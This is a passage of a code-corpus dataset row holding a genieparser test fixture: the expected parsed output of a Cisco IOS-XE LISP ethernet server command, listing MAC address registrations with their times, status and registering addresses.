hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
07b9d6df6ad2a7711b6cad8c7fbdef205bdec2f7
| 817,959
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowLispInstanceIdEthernetServer/cli/equal/golden_output_3_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowLispInstanceIdEthernetServer/cli/equal/golden_output_3_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowLispInstanceIdEthernetServer/cli/equal/golden_output_3_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"instance_id": {
4097: {"lisp": 0},
4099: {"lisp": 0},
4100: {"lisp": 0},
8188: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8188,
},
"1416.9dff.e928/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.eae8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.eb28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.ebc8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.1328/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.13e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.16c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.2428/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.10a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.01eb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.1bcb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.248b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.254b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.264b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.260c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.278b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.d16f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.1074/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.10b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.10d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.54f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.5616/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6816/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6955/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6ad5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6af5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6a16/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6d95/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6ef5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6ff5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7095/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.70d5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7395/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.73f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7336/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7495/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7416/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7555/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.75f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7695/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.76f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.77b5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7855/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7875/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7895/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.78f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7836/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7955/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7975/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7936/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7a55/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7af5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7a36/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7b75/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7b95/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7bb5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7bf5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7c75/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7cd5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7cf5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7d55/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7dd5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7e55/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.8436/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.8555/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.8636/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.89f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6e29/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"2c57.41ff.96ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"2c57.41ff.9929/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.9a41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.9b58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.9b78/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"2c57.41ff.9b90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.9ba0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.a6cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.a6d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.a6d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.af5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.afa0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b1e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b1e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"2c57.41ff.b119/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.b11d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b121/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b270/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b29c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b2bc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b2d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.b2d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.b231/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b23d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b245/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.b251/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"2c57.41ff.b360/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b368/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b37c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b390/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"2c57.41ff.b39c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b3b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b3c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.b3cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b3d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b3dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b3e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"2c57.41ff.b3e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b3ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b305/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"2c57.41ff.b309/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b31d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b325/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b32d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b331/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b335/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b33d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b34d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.b458/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b45c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b468/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b478/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.b488/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"2c57.41ff.b564/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"2c57.41ff.b568/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b5a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"2c57.41ff.b5fc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"2c57.41ff.74e3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1a07/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1cc6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.67c6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.d7a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4768/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.48e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4808/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4a28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4be7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4b08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4b68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4c08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4f87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.50e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5108/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5268/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5908/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5948/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5aa7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5ac7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5b87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5ba7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5bc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5b28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5b48/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5b68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5cc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5ce7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5c48/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5c68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5d87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5dc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5de7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5d08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5d28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5ea7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5ec7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5ee7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5e08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
